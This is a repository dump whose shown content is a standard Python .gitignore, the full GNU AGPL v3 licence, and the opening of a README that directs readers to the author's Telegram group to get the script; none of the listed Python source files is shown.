├── .gitignore ├── LICENSE ├── README.md ├── main.py ├── proxy.txt ├── requirements.txt └── winmain.py /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | .eggs/ 17 | lib/ 18 | lib64/ 19 | parts/ 20 | sdist/ 21 | var/ 22 | wheels/ 23 | share/python-wheels/ 24 | *.egg-info/ 25 | .installed.cfg 26 | *.egg 27 | MANIFEST 28 | 29 | # PyInstaller 30 | # Usually these files are written by a python script from a template 31 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 32 | *.manifest 33 | *.spec 34 | 35 | # Installer logs 36 | pip-log.txt 37 | pip-delete-this-directory.txt 38 | 39 | # Unit test / coverage reports 40 | htmlcov/ 41 | .tox/ 42 | .nox/ 43 | .coverage 44 | .coverage.* 45 | .cache 46 | nosetests.xml 47 | coverage.xml 48 | *.cover 49 | *.py,cover 50 | .hypothesis/ 51 | .pytest_cache/ 52 | cover/ 53 | 54 | # Translations 55 | *.mo 56 | *.pot 57 | 58 | # Django stuff: 59 | *.log 60 | local_settings.py 61 | db.sqlite3 62 | db.sqlite3-journal 63 | 64 | # Flask stuff: 65 | instance/ 66 | .webassets-cache 67 | 68 | # Scrapy stuff: 69 | .scrapy 70 | 71 | # Sphinx documentation 72 | docs/_build/ 73 | 74 | # PyBuilder 75 | .pybuilder/ 76 | target/ 77 | 78 | # Jupyter Notebook 79 | .ipynb_checkpoints 80 | 81 | # IPython 82 | profile_default/ 83 | ipython_config.py 84 | 85 | # pyenv 86 | # For a library or package, you might want to ignore these files since the code is 87 | # intended to run in multiple environments; otherwise, check them in: 88 | # .python-version 89 | 90 | # pipenv 91 | # According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. 92 | # However, in case of collaboration, if having platform-specific dependencies or dependencies 93 | # having no cross-platform support, pipenv may install dependencies that don't work, or not 94 | # install all needed dependencies. 95 | #Pipfile.lock 96 | 97 | # poetry 98 | # Similar to Pipfile.lock, it is generally recommended to include poetry.lock in version control. 99 | # This is especially recommended for binary packages to ensure reproducibility, and is more 100 | # commonly ignored for libraries. 101 | # https://python-poetry.org/docs/basic-usage/#commit-your-poetrylock-file-to-version-control 102 | #poetry.lock 103 | 104 | # pdm 105 | # Similar to Pipfile.lock, it is generally recommended to include pdm.lock in version control. 106 | #pdm.lock 107 | # pdm stores project-wide configurations in .pdm.toml, but it is recommended to not include it 108 | # in version control. 109 | # https://pdm.fming.dev/latest/usage/project/#working-with-version-control 110 | .pdm.toml 111 | .pdm-python 112 | .pdm-build/ 113 | 114 | # PEP 582; used by e.g. github.com/David-OConnor/pyflow and github.com/pdm-project/pdm 115 | __pypackages__/ 116 | 117 | # Celery stuff 118 | celerybeat-schedule 119 | celerybeat.pid 120 | 121 | # SageMath parsed files 122 | *.sage.py 123 | 124 | # Environments 125 | .env 126 | .venv 127 | env/ 128 | venv/ 129 | ENV/ 130 | env.bak/ 131 | venv.bak/ 132 | 133 | # Spyder project settings 134 | .spyderproject 135 | .spyproject 136 | 137 | # Rope project settings 138 | .ropeproject 139 | 140 | # mkdocs documentation 141 | /site 142 | 143 | # mypy 144 | .mypy_cache/ 145 | .dmypy.json 146 | dmypy.json 147 | 148 | # Pyre type checker 149 | .pyre/ 150 | 151 | # pytype static type analyzer 152 | .pytype/ 153 | 154 | # Cython debug symbols 155 | cython_debug/ 156 | 157 | # PyCharm 158 | # JetBrains specific template is maintained in a separate JetBrains.gitignore that can 159 | # be found at https://github.com/github/gitignore/blob/main/Global/JetBrains.gitignore 160 | # and can be added to the global gitignore or merged into this file. For a more nuclear 161 | # option (not recommended) you can uncomment the following to ignore the entire idea folder. 162 | #.idea/ 163 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | GNU AFFERO GENERAL PUBLIC LICENSE 2 | Version 3, 19 November 2007 3 | 4 | Copyright (C) 2024 FakerPK 5 | 6 | 7 | Copyright (C) 2007 Free Software Foundation, Inc. 8 | Everyone is permitted to copy and distribute verbatim copies 9 | of this license document, but changing it is not allowed. 10 | 11 | Preamble 12 | 13 | The GNU Affero General Public License is a free, copyleft license for 14 | software and other kinds of works, specifically designed to ensure 15 | cooperation with the community in the case of network server software. 16 | 17 | The licenses for most software and other practical works are designed 18 | to take away your freedom to share and change the works. By contrast, 19 | our General Public Licenses are intended to guarantee your freedom to 20 | share and change all versions of a program--to make sure it remains free 21 | software for all its users. 22 | 23 | When we speak of free software, we are referring to freedom, not 24 | price. Our General Public Licenses are designed to make sure that you 25 | have the freedom to distribute copies of free software (and charge for 26 | them if you wish), that you receive source code or can get it if you 27 | want it, that you can change the software or use pieces of it in new 28 | free programs, and that you know you can do these things. 29 | 30 | Developers that use our General Public Licenses protect your rights 31 | with two steps: (1) assert copyright on the software, and (2) offer 32 | you this License which gives you legal permission to copy, distribute 33 | and/or modify the software. 34 | 35 | A secondary benefit of defending all users' freedom is that 36 | improvements made in alternate versions of the program, if they 37 | receive widespread use, become available for other developers to 38 | incorporate. Many developers of free software are heartened and 39 | encouraged by the resulting cooperation. However, in the case of 40 | software used on network servers, this result may fail to come about. 41 | The GNU General Public License permits making a modified version and 42 | letting the public access it on a server without ever releasing its 43 | source code to the public. 44 | 45 | The GNU Affero General Public License is designed specifically to 46 | ensure that, in such cases, the modified source code becomes available 47 | to the community. It requires the operator of a network server to 48 | provide the source code of the modified version running there to the 49 | users of that server. Therefore, public use of a modified version, on 50 | a publicly accessible server, gives the public access to the source 51 | code of the modified version. 52 | 53 | An older license, called the Affero General Public License and 54 | published by Affero, was designed to accomplish similar goals. This is 55 | a different license, not a version of the Affero GPL, but Affero has 56 | released a new version of the Affero GPL which permits relicensing under 57 | this license. 58 | 59 | The precise terms and conditions for copying, distribution and 60 | modification follow. 61 | 62 | TERMS AND CONDITIONS 63 | 64 | 0. Definitions. 65 | 66 | "This License" refers to version 3 of the GNU Affero General Public License. 67 | 68 | "Copyright" also means copyright-like laws that apply to other kinds of 69 | works, such as semiconductor masks. 70 | 71 | "The Program" refers to any copyrightable work licensed under this 72 | License. Each licensee is addressed as "you". "Licensees" and 73 | "recipients" may be individuals or organizations. 74 | 75 | To "modify" a work means to copy from or adapt all or part of the work 76 | in a fashion requiring copyright permission, other than the making of an 77 | exact copy. The resulting work is called a "modified version" of the 78 | earlier work or a work "based on" the earlier work. 79 | 80 | A "covered work" means either the unmodified Program or a work based 81 | on the Program. 82 | 83 | To "propagate" a work means to do anything with it that, without 84 | permission, would make you directly or secondarily liable for 85 | infringement under applicable copyright law, except executing it on a 86 | computer or modifying a private copy. Propagation includes copying, 87 | distribution (with or without modification), making available to the 88 | public, and in some countries other activities as well. 89 | 90 | To "convey" a work means any kind of propagation that enables other 91 | parties to make or receive copies. Mere interaction with a user through 92 | a computer network, with no transfer of a copy, is not conveying. 93 | 94 | An interactive user interface displays "Appropriate Legal Notices" 95 | to the extent that it includes a convenient and prominently visible 96 | feature that (1) displays an appropriate copyright notice, and (2) 97 | tells the user that there is no warranty for the work (except to the 98 | extent that warranties are provided), that licensees may convey the 99 | work under this License, and how to view a copy of this License. If 100 | the interface presents a list of user commands or options, such as a 101 | menu, a prominent item in the list meets this criterion. 102 | 103 | 1. Source Code. 104 | 105 | The "source code" for a work means the preferred form of the work 106 | for making modifications to it. "Object code" means any non-source 107 | form of a work. 108 | 109 | A "Standard Interface" means an interface that either is an official 110 | standard defined by a recognized standards body, or, in the case of 111 | interfaces specified for a particular programming language, one that 112 | is widely used among developers working in that language. 113 | 114 | The "System Libraries" of an executable work include anything, other 115 | than the work as a whole, that (a) is included in the normal form of 116 | packaging a Major Component, but which is not part of that Major 117 | Component, and (b) serves only to enable use of the work with that 118 | Major Component, or to implement a Standard Interface for which an 119 | implementation is available to the public in source code form. A 120 | "Major Component", in this context, means a major essential component 121 | (kernel, window system, and so on) of the specific operating system 122 | (if any) on which the executable work runs, or a compiler used to 123 | produce the work, or an object code interpreter used to run it. 124 | 125 | The "Corresponding Source" for a work in object code form means all 126 | the source code needed to generate, install, and (for an executable 127 | work) run the object code and to modify the work, including scripts to 128 | control those activities. However, it does not include the work's 129 | System Libraries, or general-purpose tools or generally available free 130 | programs which are used unmodified in performing those activities but 131 | which are not part of the work. For example, Corresponding Source 132 | includes interface definition files associated with source files for 133 | the work, and the source code for shared libraries and dynamically 134 | linked subprograms that the work is specifically designed to require, 135 | such as by intimate data communication or control flow between those 136 | subprograms and other parts of the work. 137 | 138 | The Corresponding Source need not include anything that users 139 | can regenerate automatically from other parts of the Corresponding 140 | Source. 141 | 142 | The Corresponding Source for a work in source code form is that 143 | same work. 144 | 145 | 2. Basic Permissions. 146 | 147 | All rights granted under this License are granted for the term of 148 | copyright on the Program, and are irrevocable provided the stated 149 | conditions are met. This License explicitly affirms your unlimited 150 | permission to run the unmodified Program. The output from running a 151 | covered work is covered by this License only if the output, given its 152 | content, constitutes a covered work. This License acknowledges your 153 | rights of fair use or other equivalent, as provided by copyright law. 154 | 155 | You may make, run and propagate covered works that you do not 156 | convey, without conditions so long as your license otherwise remains 157 | in force. You may convey covered works to others for the sole purpose 158 | of having them make modifications exclusively for you, or provide you 159 | with facilities for running those works, provided that you comply with 160 | the terms of this License in conveying all material for which you do 161 | not control copyright. Those thus making or running the covered works 162 | for you must do so exclusively on your behalf, under your direction 163 | and control, on terms that prohibit them from making any copies of 164 | your copyrighted material outside their relationship with you. 165 | 166 | Conveying under any other circumstances is permitted solely under 167 | the conditions stated below. Sublicensing is not allowed; section 10 168 | makes it unnecessary. 169 | 170 | 3. Protecting Users' Legal Rights From Anti-Circumvention Law. 171 | 172 | No covered work shall be deemed part of an effective technological 173 | measure under any applicable law fulfilling obligations under article 174 | 11 of the WIPO copyright treaty adopted on 20 December 1996, or 175 | similar laws prohibiting or restricting circumvention of such 176 | measures. 177 | 178 | When you convey a covered work, you waive any legal power to forbid 179 | circumvention of technological measures to the extent such circumvention 180 | is effected by exercising rights under this License with respect to 181 | the covered work, and you disclaim any intention to limit operation or 182 | modification of the work as a means of enforcing, against the work's 183 | users, your or third parties' legal rights to forbid circumvention of 184 | technological measures. 185 | 186 | 4. Conveying Verbatim Copies. 187 | 188 | You may convey verbatim copies of the Program's source code as you 189 | receive it, in any medium, provided that you conspicuously and 190 | appropriately publish on each copy an appropriate copyright notice; 191 | keep intact all notices stating that this License and any 192 | non-permissive terms added in accord with section 7 apply to the code; 193 | keep intact all notices of the absence of any warranty; and give all 194 | recipients a copy of this License along with the Program. 195 | 196 | You may charge any price or no price for each copy that you convey, 197 | and you may offer support or warranty protection for a fee. 198 | 199 | 5. Conveying Modified Source Versions. 200 | 201 | You may convey a work based on the Program, or the modifications to 202 | produce it from the Program, in the form of source code under the 203 | terms of section 4, provided that you also meet all of these conditions: 204 | 205 | a) The work must carry prominent notices stating that you modified 206 | it, and giving a relevant date. 207 | 208 | b) The work must carry prominent notices stating that it is 209 | released under this License and any conditions added under section 210 | 7. This requirement modifies the requirement in section 4 to 211 | "keep intact all notices". 212 | 213 | c) You must license the entire work, as a whole, under this 214 | License to anyone who comes into possession of a copy. This 215 | License will therefore apply, along with any applicable section 7 216 | additional terms, to the whole of the work, and all its parts, 217 | regardless of how they are packaged. This License gives no 218 | permission to license the work in any other way, but it does not 219 | invalidate such permission if you have separately received it. 220 | 221 | d) If the work has interactive user interfaces, each must display 222 | Appropriate Legal Notices; however, if the Program has interactive 223 | interfaces that do not display Appropriate Legal Notices, your 224 | work need not make them do so. 225 | 226 | A compilation of a covered work with other separate and independent 227 | works, which are not by their nature extensions of the covered work, 228 | and which are not combined with it such as to form a larger program, 229 | in or on a volume of a storage or distribution medium, is called an 230 | "aggregate" if the compilation and its resulting copyright are not 231 | used to limit the access or legal rights of the compilation's users 232 | beyond what the individual works permit. Inclusion of a covered work 233 | in an aggregate does not cause this License to apply to the other 234 | parts of the aggregate. 235 | 236 | 6. Conveying Non-Source Forms. 237 | 238 | You may convey a covered work in object code form under the terms 239 | of sections 4 and 5, provided that you also convey the 240 | machine-readable Corresponding Source under the terms of this License, 241 | in one of these ways: 242 | 243 | a) Convey the object code in, or embodied in, a physical product 244 | (including a physical distribution medium), accompanied by the 245 | Corresponding Source fixed on a durable physical medium 246 | customarily used for software interchange. 247 | 248 | b) Convey the object code in, or embodied in, a physical product 249 | (including a physical distribution medium), accompanied by a 250 | written offer, valid for at least three years and valid for as 251 | long as you offer spare parts or customer support for that product 252 | model, to give anyone who possesses the object code either (1) a 253 | copy of the Corresponding Source for all the software in the 254 | product that is covered by this License, on a durable physical 255 | medium customarily used for software interchange, for a price no 256 | more than your reasonable cost of physically performing this 257 | conveying of source, or (2) access to copy the 258 | Corresponding Source from a network server at no charge. 259 | 260 | c) Convey individual copies of the object code with a copy of the 261 | written offer to provide the Corresponding Source. This 262 | alternative is allowed only occasionally and noncommercially, and 263 | only if you received the object code with such an offer, in accord 264 | with subsection 6b. 265 | 266 | d) Convey the object code by offering access from a designated 267 | place (gratis or for a charge), and offer equivalent access to the 268 | Corresponding Source in the same way through the same place at no 269 | further charge. You need not require recipients to copy the 270 | Corresponding Source along with the object code. If the place to 271 | copy the object code is a network server, the Corresponding Source 272 | may be on a different server (operated by you or a third party) 273 | that supports equivalent copying facilities, provided you maintain 274 | clear directions next to the object code saying where to find the 275 | Corresponding Source. Regardless of what server hosts the 276 | Corresponding Source, you remain obligated to ensure that it is 277 | available for as long as needed to satisfy these requirements. 278 | 279 | e) Convey the object code using peer-to-peer transmission, provided 280 | you inform other peers where the object code and Corresponding 281 | Source of the work are being offered to the general public at no 282 | charge under subsection 6d. 283 | 284 | A separable portion of the object code, whose source code is excluded 285 | from the Corresponding Source as a System Library, need not be 286 | included in conveying the object code work. 287 | 288 | A "User Product" is either (1) a "consumer product", which means any 289 | tangible personal property which is normally used for personal, family, 290 | or household purposes, or (2) anything designed or sold for incorporation 291 | into a dwelling. In determining whether a product is a consumer product, 292 | doubtful cases shall be resolved in favor of coverage. For a particular 293 | product received by a particular user, "normally used" refers to a 294 | typical or common use of that class of product, regardless of the status 295 | of the particular user or of the way in which the particular user 296 | actually uses, or expects or is expected to use, the product. A product 297 | is a consumer product regardless of whether the product has substantial 298 | commercial, industrial or non-consumer uses, unless such uses represent 299 | the only significant mode of use of the product. 300 | 301 | "Installation Information" for a User Product means any methods, 302 | procedures, authorization keys, or other information required to install 303 | and execute modified versions of a covered work in that User Product from 304 | a modified version of its Corresponding Source. The information must 305 | suffice to ensure that the continued functioning of the modified object 306 | code is in no case prevented or interfered with solely because 307 | modification has been made. 308 | 309 | If you convey an object code work under this section in, or with, or 310 | specifically for use in, a User Product, and the conveying occurs as 311 | part of a transaction in which the right of possession and use of the 312 | User Product is transferred to the recipient in perpetuity or for a 313 | fixed term (regardless of how the transaction is characterized), the 314 | Corresponding Source conveyed under this section must be accompanied 315 | by the Installation Information. But this requirement does not apply 316 | if neither you nor any third party retains the ability to install 317 | modified object code on the User Product (for example, the work has 318 | been installed in ROM). 319 | 320 | The requirement to provide Installation Information does not include a 321 | requirement to continue to provide support service, warranty, or updates 322 | for a work that has been modified or installed by the recipient, or for 323 | the User Product in which it has been modified or installed. Access to a 324 | network may be denied when the modification itself materially and 325 | adversely affects the operation of the network or violates the rules and 326 | protocols for communication across the network. 327 | 328 | Corresponding Source conveyed, and Installation Information provided, 329 | in accord with this section must be in a format that is publicly 330 | documented (and with an implementation available to the public in 331 | source code form), and must require no special password or key for 332 | unpacking, reading or copying. 333 | 334 | 7. Additional Terms. 335 | 336 | "Additional permissions" are terms that supplement the terms of this 337 | License by making exceptions from one or more of its conditions. 338 | Additional permissions that are applicable to the entire Program shall 339 | be treated as though they were included in this License, to the extent 340 | that they are valid under applicable law. If additional permissions 341 | apply only to part of the Program, that part may be used separately 342 | under those permissions, but the entire Program remains governed by 343 | this License without regard to the additional permissions. 344 | 345 | When you convey a copy of a covered work, you may at your option 346 | remove any additional permissions from that copy, or from any part of 347 | it. (Additional permissions may be written to require their own 348 | removal in certain cases when you modify the work.) You may place 349 | additional permissions on material, added by you to a covered work, 350 | for which you have or can give appropriate copyright permission. 351 | 352 | Notwithstanding any other provision of this License, for material you 353 | add to a covered work, you may (if authorized by the copyright holders of 354 | that material) supplement the terms of this License with terms: 355 | 356 | a) Disclaiming warranty or limiting liability differently from the 357 | terms of sections 15 and 16 of this License; or 358 | 359 | b) Requiring preservation of specified reasonable legal notices or 360 | author attributions in that material or in the Appropriate Legal 361 | Notices displayed by works containing it; or 362 | 363 | c) Prohibiting misrepresentation of the origin of that material, or 364 | requiring that modified versions of such material be marked in 365 | reasonable ways as different from the original version; or 366 | 367 | d) Limiting the use for publicity purposes of names of licensors or 368 | authors of the material; or 369 | 370 | e) Declining to grant rights under trademark law for use of some 371 | trade names, trademarks, or service marks; or 372 | 373 | f) Requiring indemnification of licensors and authors of that 374 | material by anyone who conveys the material (or modified versions of 375 | it) with contractual assumptions of liability to the recipient, for 376 | any liability that these contractual assumptions directly impose on 377 | those licensors and authors. 378 | 379 | All other non-permissive additional terms are considered "further 380 | restrictions" within the meaning of section 10. If the Program as you 381 | received it, or any part of it, contains a notice stating that it is 382 | governed by this License along with a term that is a further 383 | restriction, you may remove that term. If a license document contains 384 | a further restriction but permits relicensing or conveying under this 385 | License, you may add to a covered work material governed by the terms 386 | of that license document, provided that the further restriction does 387 | not survive such relicensing or conveying. 388 | 389 | If you add terms to a covered work in accord with this section, you 390 | must place, in the relevant source files, a statement of the 391 | additional terms that apply to those files, or a notice indicating 392 | where to find the applicable terms. 393 | 394 | Additional terms, permissive or non-permissive, may be stated in the 395 | form of a separately written license, or stated as exceptions; 396 | the above requirements apply either way. 397 | 398 | 8. Termination. 399 | 400 | You may not propagate or modify a covered work except as expressly 401 | provided under this License. Any attempt otherwise to propagate or 402 | modify it is void, and will automatically terminate your rights under 403 | this License (including any patent licenses granted under the third 404 | paragraph of section 11). 405 | 406 | However, if you cease all violation of this License, then your 407 | license from a particular copyright holder is reinstated (a) 408 | provisionally, unless and until the copyright holder explicitly and 409 | finally terminates your license, and (b) permanently, if the copyright 410 | holder fails to notify you of the violation by some reasonable means 411 | prior to 60 days after the cessation. 412 | 413 | Moreover, your license from a particular copyright holder is 414 | reinstated permanently if the copyright holder notifies you of the 415 | violation by some reasonable means, this is the first time you have 416 | received notice of violation of this License (for any work) from that 417 | copyright holder, and you cure the violation prior to 30 days after 418 | your receipt of the notice. 419 | 420 | Termination of your rights under this section does not terminate the 421 | licenses of parties who have received copies or rights from you under 422 | this License. If your rights have been terminated and not permanently 423 | reinstated, you do not qualify to receive new licenses for the same 424 | material under section 10. 425 | 426 | 9. Acceptance Not Required for Having Copies. 427 | 428 | You are not required to accept this License in order to receive or 429 | run a copy of the Program. Ancillary propagation of a covered work 430 | occurring solely as a consequence of using peer-to-peer transmission 431 | to receive a copy likewise does not require acceptance. However, 432 | nothing other than this License grants you permission to propagate or 433 | modify any covered work. These actions infringe copyright if you do 434 | not accept this License. Therefore, by modifying or propagating a 435 | covered work, you indicate your acceptance of this License to do so. 436 | 437 | 10. Automatic Licensing of Downstream Recipients. 438 | 439 | Each time you convey a covered work, the recipient automatically 440 | receives a license from the original licensors, to run, modify and 441 | propagate that work, subject to this License. You are not responsible 442 | for enforcing compliance by third parties with this License. 443 | 444 | An "entity transaction" is a transaction transferring control of an 445 | organization, or substantially all assets of one, or subdividing an 446 | organization, or merging organizations. If propagation of a covered 447 | work results from an entity transaction, each party to that 448 | transaction who receives a copy of the work also receives whatever 449 | licenses to the work the party's predecessor in interest had or could 450 | give under the previous paragraph, plus a right to possession of the 451 | Corresponding Source of the work from the predecessor in interest, if 452 | the predecessor has it or can get it with reasonable efforts. 453 | 454 | You may not impose any further restrictions on the exercise of the 455 | rights granted or affirmed under this License. For example, you may 456 | not impose a license fee, royalty, or other charge for exercise of 457 | rights granted under this License, and you may not initiate litigation 458 | (including a cross-claim or counterclaim in a lawsuit) alleging that 459 | any patent claim is infringed by making, using, selling, offering for 460 | sale, or importing the Program or any portion of it. 461 | 462 | 11. Patents. 463 | 464 | A "contributor" is a copyright holder who authorizes use under this 465 | License of the Program or a work on which the Program is based. The 466 | work thus licensed is called the contributor's "contributor version". 467 | 468 | A contributor's "essential patent claims" are all patent claims 469 | owned or controlled by the contributor, whether already acquired or 470 | hereafter acquired, that would be infringed by some manner, permitted 471 | by this License, of making, using, or selling its contributor version, 472 | but do not include claims that would be infringed only as a 473 | consequence of further modification of the contributor version. For 474 | purposes of this definition, "control" includes the right to grant 475 | patent sublicenses in a manner consistent with the requirements of 476 | this License. 477 | 478 | Each contributor grants you a non-exclusive, worldwide, royalty-free 479 | patent license under the contributor's essential patent claims, to 480 | make, use, sell, offer for sale, import and otherwise run, modify and 481 | propagate the contents of its contributor version. 482 | 483 | In the following three paragraphs, a "patent license" is any express 484 | agreement or commitment, however denominated, not to enforce a patent 485 | (such as an express permission to practice a patent or covenant not to 486 | sue for patent infringement). To "grant" such a patent license to a 487 | party means to make such an agreement or commitment not to enforce a 488 | patent against the party. 489 | 490 | If you convey a covered work, knowingly relying on a patent license, 491 | and the Corresponding Source of the work is not available for anyone 492 | to copy, free of charge and under the terms of this License, through a 493 | publicly available network server or other readily accessible means, 494 | then you must either (1) cause the Corresponding Source to be so 495 | available, or (2) arrange to deprive yourself of the benefit of the 496 | patent license for this particular work, or (3) arrange, in a manner 497 | consistent with the requirements of this License, to extend the patent 498 | license to downstream recipients. "Knowingly relying" means you have 499 | actual knowledge that, but for the patent license, your conveying the 500 | covered work in a country, or your recipient's use of the covered work 501 | in a country, would infringe one or more identifiable patents in that 502 | country that you have reason to believe are valid. 503 | 504 | If, pursuant to or in connection with a single transaction or 505 | arrangement, you convey, or propagate by procuring conveyance of, a 506 | covered work, and grant a patent license to some of the parties 507 | receiving the covered work authorizing them to use, propagate, modify 508 | or convey a specific copy of the covered work, then the patent license 509 | you grant is automatically extended to all recipients of the covered 510 | work and works based on it. 511 | 512 | A patent license is "discriminatory" if it does not include within 513 | the scope of its coverage, prohibits the exercise of, or is 514 | conditioned on the non-exercise of one or more of the rights that are 515 | specifically granted under this License. You may not convey a covered 516 | work if you are a party to an arrangement with a third party that is 517 | in the business of distributing software, under which you make payment 518 | to the third party based on the extent of your activity of conveying 519 | the work, and under which the third party grants, to any of the 520 | parties who would receive the covered work from you, a discriminatory 521 | patent license (a) in connection with copies of the covered work 522 | conveyed by you (or copies made from those copies), or (b) primarily 523 | for and in connection with specific products or compilations that 524 | contain the covered work, unless you entered into that arrangement, 525 | or that patent license was granted, prior to 28 March 2007. 526 | 527 | Nothing in this License shall be construed as excluding or limiting 528 | any implied license or other defenses to infringement that may 529 | otherwise be available to you under applicable patent law. 530 | 531 | 12. No Surrender of Others' Freedom. 532 | 533 | If conditions are imposed on you (whether by court order, agreement or 534 | otherwise) that contradict the conditions of this License, they do not 535 | excuse you from the conditions of this License. If you cannot convey a 536 | covered work so as to satisfy simultaneously your obligations under this 537 | License and any other pertinent obligations, then as a consequence you may 538 | not convey it at all. For example, if you agree to terms that obligate you 539 | to collect a royalty for further conveying from those to whom you convey 540 | the Program, the only way you could satisfy both those terms and this 541 | License would be to refrain entirely from conveying the Program. 542 | 543 | 13. Remote Network Interaction; Use with the GNU General Public License. 544 | 545 | Notwithstanding any other provision of this License, if you modify the 546 | Program, your modified version must prominently offer all users 547 | interacting with it remotely through a computer network (if your version 548 | supports such interaction) an opportunity to receive the Corresponding 549 | Source of your version by providing access to the Corresponding Source 550 | from a network server at no charge, through some standard or customary 551 | means of facilitating copying of software. This Corresponding Source 552 | shall include the Corresponding Source for any work covered by version 3 553 | of the GNU General Public License that is incorporated pursuant to the 554 | following paragraph. 555 | 556 | Notwithstanding any other provision of this License, you have 557 | permission to link or combine any covered work with a work licensed 558 | under version 3 of the GNU General Public License into a single 559 | combined work, and to convey the resulting work. The terms of this 560 | License will continue to apply to the part which is the covered work, 561 | but the work with which it is combined will remain governed by version 562 | 3 of the GNU General Public License. 563 | 564 | 14. Revised Versions of this License. 565 | 566 | The Free Software Foundation may publish revised and/or new versions of 567 | the GNU Affero General Public License from time to time. Such new versions 568 | will be similar in spirit to the present version, but may differ in detail to 569 | address new problems or concerns. 570 | 571 | Each version is given a distinguishing version number. If the 572 | Program specifies that a certain numbered version of the GNU Affero General 573 | Public License "or any later version" applies to it, you have the 574 | option of following the terms and conditions either of that numbered 575 | version or of any later version published by the Free Software 576 | Foundation. If the Program does not specify a version number of the 577 | GNU Affero General Public License, you may choose any version ever published 578 | by the Free Software Foundation. 579 | 580 | If the Program specifies that a proxy can decide which future 581 | versions of the GNU Affero General Public License can be used, that proxy's 582 | public statement of acceptance of a version permanently authorizes you 583 | to choose that version for the Program. 584 | 585 | Later license versions may give you additional or different 586 | permissions. However, no additional obligations are imposed on any 587 | author or copyright holder as a result of your choosing to follow a 588 | later version. 589 | 590 | 15. Disclaimer of Warranty. 591 | 592 | THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY 593 | APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT 594 | HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY 595 | OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, 596 | THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 597 | PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM 598 | IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF 599 | ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 600 | 601 | 16. Limitation of Liability. 602 | 603 | IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING 604 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS 605 | THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY 606 | GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE 607 | USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF 608 | DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD 609 | PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), 610 | EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF 611 | SUCH DAMAGES. 612 | 613 | 17. Interpretation of Sections 15 and 16. 614 | 615 | If the disclaimer of warranty and limitation of liability provided 616 | above cannot be given local legal effect according to their terms, 617 | reviewing courts shall apply local law that most closely approximates 618 | an absolute waiver of all civil liability in connection with the 619 | Program, unless a warranty or assumption of liability accompanies a 620 | copy of the Program in return for a fee. 621 | 622 | END OF TERMS AND CONDITIONS 623 | 624 | How to Apply These Terms to Your New Programs 625 | 626 | If you develop a new program, and you want it to be of the greatest 627 | possible use to the public, the best way to achieve this is to make it 628 | free software which everyone can redistribute and change under these terms. 629 | 630 | To do so, attach the following notices to the program. It is safest 631 | to attach them to the start of each source file to most effectively 632 | state the exclusion of warranty; and each file should have at least 633 | the "copyright" line and a pointer to where the full notice is found. 634 | 635 | 636 | Copyright (C) 637 | 638 | This program is free software: you can redistribute it and/or modify 639 | it under the terms of the GNU Affero General Public License as published 640 | by the Free Software Foundation, either version 3 of the License, or 641 | (at your option) any later version. 642 | 643 | This program is distributed in the hope that it will be useful, 644 | but WITHOUT ANY WARRANTY; without even the implied warranty of 645 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 646 | GNU Affero General Public License for more details. 647 | 648 | You should have received a copy of the GNU Affero General Public License 649 | along with this program. If not, see . 650 | 651 | Also add information on how to contact you by electronic and paper mail. 652 | 653 | If your software can interact with users remotely through a computer 654 | network, you should also make sure that it provides a way for users to 655 | get its source. For example, if your program is a web application, its 656 | interface could display a "Source" link that leads users to an archive 657 | of the code. There are many ways you could offer source, and different 658 | solutions will be better for different programs; see section 13 for the 659 | specific requirements. 660 | 661 | You should also get your employer (if you work as a programmer) or school, 662 | if any, to sign a "copyright disclaimer" for the program, if necessary. 663 | For more information on this, and how to apply and follow the GNU AGPL, see 664 | . 665 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # ⚠️ **DISCLAIMER** ⚠️ 2 | ## **Important:** 3 | ### To prevent unauthorized distribution and theft of this script, **please join my exclusive Telegram group to obtain the latest version and updates, It's all free. Click on the Telegram Icon to join my group:** 4 |

